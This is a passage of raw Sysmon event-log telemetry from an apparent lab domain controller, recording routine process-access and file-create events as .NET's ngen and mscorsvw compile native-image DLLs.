ow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923C-6005-2A04-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.180{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-923C-6005-2A04-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:52.180{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923C-6005-2A04-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:52.117{59A5CD1D-923B-6005-2904-00000000A301}1128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\468-0\System.Data.Services.Design.dll2021-01-18 13:50:52.117 10341000x80000000000000008470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.711{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.695{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.695{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.617{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923D-6005-2C04-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.601{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923D-6005-2C04-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:53.601{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923D-6005-2C04-00000000A301}4236C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:53.492{59A5CD1D-923C-6005-2B04-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1274-0\System.Data.SqlXml.dll2021-01-18 13:50:53.492 10341000x80000000000000008477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.820{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.820{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-923E-6005-2E04-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.430{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-923E-6005-2E04-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:54.430{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-923E-6005-2E04-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:54.336{59A5CD1D-923D-6005-2D04-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\127c-0\System.Deployment.dll2021-01-18 13:50:54.336 10341000x80000000000000008484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.867{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.867{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9242-6005-3104-00000000A301}4204C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9242-6005-3004-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.820{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9242-6005-3004-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:58.820{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9242-6005-3004-00000000A301}4884C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:58.523{59A5CD1D-923E-6005-2F04-00000000A301}4064C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fe0-0\System.Design.dll2021-01-18 13:50:58.523 11241100x80000000000000008499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:59.976{59A5CD1D-9243-6005-3504-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c50-0\System.DirectoryServices.Protocols.dll2021-01-18 13:50:59.976 10341000x80000000000000008498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 